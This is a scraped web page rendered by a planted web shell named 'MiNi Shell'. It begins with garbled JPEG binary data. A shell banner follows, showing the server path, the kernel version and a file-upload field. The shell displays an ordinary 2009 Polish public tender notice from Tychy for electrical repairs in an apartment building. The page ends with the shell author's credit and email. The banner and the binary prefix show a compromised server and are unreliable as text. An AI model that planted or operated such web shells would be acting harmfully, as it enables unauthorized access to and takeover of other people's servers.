JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090304/45565-N-2009.html

<p class="kh_header"><b>Tychy: Remont wewnętrznej instalacji elektrycznej w budynku mieszkalnym -
            wielorodzinnym Wspólnoty Mieszkaniowej Nr 38/IV w Tychach, 
            przy ul. Edukacji 56-64</b><br>
<b>Numer ogłoszenia: 45565 - 2009; data zamieszczenia: 04.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka  Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont wewnętrznej instalacji elektrycznej w budynku mieszkalnym -
            wielorodzinnym Wspólnoty Mieszkaniowej Nr 38/IV w Tychach, 
            przy ul. Edukacji 56-64.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane dotyczące wykonania remontu instalacji
        elektrycznej w 60 lokalach mieszkalnych oraz w części wspólnej (klatki schodowe - 5 kl.,
        piwnice) w budynku mieszkalnym - wielorodzinnym, administrowanym przez 
        Rejon Obsługi Mieszkańców Nr IV z siedzibą w Tychach, przy ul. Edukacji 56-64

       Zakres robót obejmuje m.in.:

       

      1. Remont instalacji elektrycznej:
      	- wymianę tablic głównych
		- wymianę wewnętrznych linii zasilających na odcinku złącze wyłącznik główny - tablice 
          główne, 
		- piony wewnętrznych linii zasilających (WLZ) i tablice piętrowe,
		- wymianę tablic lokatorskich w mieszkaniach wraz z wymianą istniejących zabezpieczeń 
          oraz zamontowanie włączników ochronnych p/porażeniowych na tablicy,
 		- wydzielenie układów pomiarowych dla lokatorów i administracyjnych klatek schodowych, 
          piwnic,
		- wykonanie nowych obwodów do gniazd w kuchni i łazience
		- instalacja oświetleniowa na klatkach schodowych, piwnicach,
		- uziomy wyrównawcze w piwnicach,
		- wyłącznik główny na zewnątrz budynku p/pożarowy.
      2. Roboty towarzyszące:
        - roboty tynkarskie
        - wywóz i utylizacja gruzu









    Szczegółowy zakres robót określa przedmiar robót: 
      
        - Przedmiar robót część A  
1.	Zasilanie kl. 56-58 w lp. od  1 ÷ 17
2.	Wewnętrzne linie zasilające kl. 56-58 w lp. od  18 ÷ 36
3.	Mieszkania kl. 56-58 w lp. od  37 ÷ 53
4.	Administracja kl. 56-58 w lp. od  54 ÷ 71
5.	Demontaż kl. 56-58 w lp. od  72 ÷ 76

       - Przedmiar robót część B   
1.	Zasilanie kl. 60-62-64 w lp. od  1 ÷ 18
2.	Wewnętrzne linie zasilające kl. 60-62-64 w lp. od  19 ÷ 37
3.	Mieszkania kl. 60-62-64 w lp. od  38 ÷ 54
4.	Administracja kl. 60-62-64 w lp. od  55 ÷ 72
5.	Demontaż kl. 60-62-64 w lp. od  73 ÷ 77

       w których przedstawiono podstawy nakładów rzeczowych, ilość i jednostkę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.00.00-3, 45.30.00.00-0, 45.41.00.00-4, 45.11.12.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Informacja na temat wadium:   4 000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków:    
O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone na podstawie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych ( Dz. U. z 2006 r., Nr 164, poz. 1163, 
Nr 170, poz. 1217 i Nr 227, poz.1658, z 2007 r. Nr 64, poz. 427 i Nr 82, poz. 560 oraz z 2008 r. Nr 171, poz. 1058), tj.:  
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają
  obowiązek posiadania takich uprawnień; 
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami
  zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów 
  do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2
  ustawy Pzp., 
oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia.
                                

Ocena spełnienia ww. warunków zostanie dokonana zgodnie z formułą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach lub dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:

Wykonawcy ubiegający się o zamówienie publiczne muszą złożyć oświadczenie, że spełniają warunki udziału w postępowaniu stosownie do treści art. 44 w związku z art. 22 ust. 1 pkt. 1÷ 4 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U.  z 2006 r., Nr 164, poz. 1163, Nr 170, 
poz. 1217 i Nr 227, poz. 1658, z 2007 r. Nr 64, poz. 427 i Nr 82, poz. 560 oraz z 2008 r. Nr 171, 
poz. 1058),

- wzór druku oświadczenia stanowi załącznik do niniejszej specyfikacji,
(W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oświadczenie o spełnianiu warunków udziału w postępowaniu Wykonawcy składają łącznie)

Ocena spełnienia ww. warunku zostanie dokonana zgodnie z formułą spełnia / nie spełnia.

A.	Sytuacja podmiotowa wykonawców, w tym wymogi dotyczące wpisu do rejestru 
     zawodowego lub handlowego:

Informacje i formalności konieczne do dokonania oceny spełnienia wymogów:    
               
  1. W celu potwierdzenia, że Wykonawcy posiadają uprawnienia do wykonywania określonej 
       działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz, że 
       nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo  
       zamówień publicznych, Wykonawcy zobowiązani są przedłożyć następujące dokumenty:  

1)	aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie do ewidencji
     działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
     do ewidencji działalności gospodarcze - wystawiony nie wcześniej niż 6 miesięcy przed upływem
      terminu składania ofert;    
   
2)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału 
     Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
       potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat 
       oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał 
       przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
       wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej     
       niż 3 miesiące przed upływem terminu składania ofert;

        -W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
       przedmiotowe dokumenty wymienione w punkcie 1) i 2) muszą być złożone dla każdego z nich.

2.  Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. 
     (Dz. U. Nr 87, poz. 605, z późn. zm.) w sprawie rodzajów dokumentów potwierdzających 
     spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich 
     może żądać Zamawiający od Wykonawcy:
1)  jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  
     Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 1) i  2) - składa dokument lub 
     dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
     potwierdzające odpowiednio, że:  
     a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
     b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i 
          zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na 
          raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;  
2)  jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce 
     zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie XII A.1. p.pkt. 1) i 2),  
     zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem,   
     właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub 
     gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma 
     siedzibę lub miejsce zamieszkania. 

     Ocena spełnienia ww. wymagań zostanie dokonana zgodnie z formułą spełnia / nie spełnia.

B.  Zdolność ekonomiczna i finansowa  
  
     Informacje i formalności konieczne do dokonania oceny spełnienia wymogów:

    W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej    
    zapewniającej wykonanie zamówienia Zamawiający wymaga, aby Wykonawca wykazał że
    jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
    - o wartości ubezpieczenia nie mniejszej niż 150 000,00 zł. 
    Do oferty należy załączyć:
      aktualną polisę, a w przypadku jej braku inny dokument potwierdzający, że
      Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej
     działalności - o wartości ubezpieczenia nie mniejszej niż 150 000,00 zł. 

     Kwotę ubezpieczenia wyrażoną w innej walucie niż PLN, Zamawiający przeliczy na PLN, przyjmując 
     do przeliczeń średni kurs danej waluty podany w dniu otwarcia ofert przez Narodowy Bank Polski.


    - W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za spełniony, jeżeli 
      Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co najmniej jeden z wykonawców.  

    Ocena spełnienia ww. wymagań zostanie dokonana zgodnie z formułą spełnia / nie spełnia.	

C. Zdolność techniczna

    Informacje i formalności konieczne do dokonania oceny spełnienia wymogów:
    W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz, że 
    dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,  
     Zamawiający wymaga, aby wykonawca wykazał, że:

1) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia  
     publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał    
     z należytą starannością co najmniej dwie roboty odpowiadające swoim rodzajem i wartością  
     robotom budowlanym stanowiącym przedmiot zamówienia - należy wykazać co najmniej
     dwie roboty zrealizowane w ramach odrębnych kontraktów, polegające na wykonaniu 
     robót instalacyjnych branży elektrycznej o wartości każdej z tych robót nie mniejszej niż
     88 000,00 zł (brutto) 

      Do oferty należy załączyć:

  -  wykaz wykonanych robót budowlanych odpowiadających swoim rodzajem i wartością
     robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz
     daty i miejsca wykonania - należy wykazać co najmniej d w i e roboty budowlane
      zrealizowane w ramach odrębnych kontraktów, polegające na wykonaniu robót 
      instalacyjnych branży elektrycznej o wartości każdej z tych robót nie mniejszej 
      niż 88 000,00 zł (brutto) oraz załączyć dokumenty potwierdzające, że roboty 
      te zostały wykonane należycie.

      Wykaz wykonanych robót budowlanych o charakterze podobnym do przedmiotu zamówienia należy 
      sporządzić wg wzoru druku stanowiącego załącznik do SIWZ. 
    - W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać 
      łącznie lub co najmniej jeden z Wykonawców)

2)  dysponuje lub będzie dysponował osobami które będą uczestniczyć w wykonywaniu 
     zamówienia, w szczególności uprawnionymi do sprawowania samodzielnych funkcji   
     technicznych w budownictwie w specjalnościach niezbędnych do projektowania i wykonania      
     robót budowlanych (art. 12 i 13 ustawy z dnia 7 lipca 1994 r. - Prawo Budowlane 
    (Dz. U. z 2006r., Nr 156, poz.118 z późn. zmianami), którzy są członkami Polskiej Izby
     Inżynierów Budownictwa (art.6 ustawy z dnia 15 grudnia 2000r. samorządach zawodowych,
     architektów, inżynierów budowlanych i Urbanistów, Dz. U. z 2001 r. Nr 5, poz. 42 
     z późn. zm.), tj.: 

 a)  osobą posiadającą uprawnienia budowlane w specjalności instalacyjno - inżynieryjnej 
      w zakresie instalacji elektrycznych; 
 b)  osobą posiadającą kwalifikacje uprawniające do zajmowania się eksploatacją urządzeń
      i instalacji elektrycznych na stanowisku dozoru;
c)  co najmniej trzema osobami posiadającymi kwalifikacje do wykonywania pracy na stanowisku 
     eksploatacji w zakresie obsługi, konserwacji i remontów urządzeń i instalacji elektrycznych  
     o napięciu do 1 kV; 
 d)  osobą posiadającą kwalifikacje uprawniające do wykonywania pomiarów ochron 
      przeciwporażeniowych;

Do oferty należy dołączyć:
- wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą 
  uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji
  zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także 
  zakresu wykonywanych przez nich czynności. 

  Wykonawca, który wskaże w wykazie, osoby, którymi będzie dysponował winien złożyć pisemne
  zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia  


      Do wykazu osób należy dołączyć:
a)	uprawnienia budowlane w specjalności w specjalności instalacyjno - inżynieryjnej w zakresie 
      instalacji elektrycznych oraz aktualne zaświadczenie wydane przez właściwą Izbę Inżynierów 
      Budownictwa 
  b)  świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń i instalacji 
       elektrycznych na stanowisku dozoru;
  c)  świadectwa kwalifikacyjne uprawniające do wykonywania pracy na stanowisku eksploatacji 
       w zakresie obsługi, konserwacji i remontów urządzeń i instalacji elektrycznych o napięciu 
      do 1kV;
  d)  świadectwo kwalifikacyjne uprawniające do wykonywania pomiarów ochron 
       przeciwporażeniowych;

     Wykaz osób należy sporządzić wg wzoru druku stanowiącego załącznik do SIWZ.

    (W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać
     łącznie lub co najmniej jeden z Wykonawców)
     Ocena spełnienia ww. warunków zostanie dokonana zgodnie z formułą spełnia / nie spełnia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego - pok. 20 - cena 40 zł (brutto).
Opłata dotyczy wykonawców, którzy odbiorą SIWZ osobiście lub złożą wniosek o jej przekazanie za zaliczeniem pocztowym..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2009 godzina 11:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach, 
          ul. Filaretów 31 -   SEKRETARIAT - pokój nr 15,.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com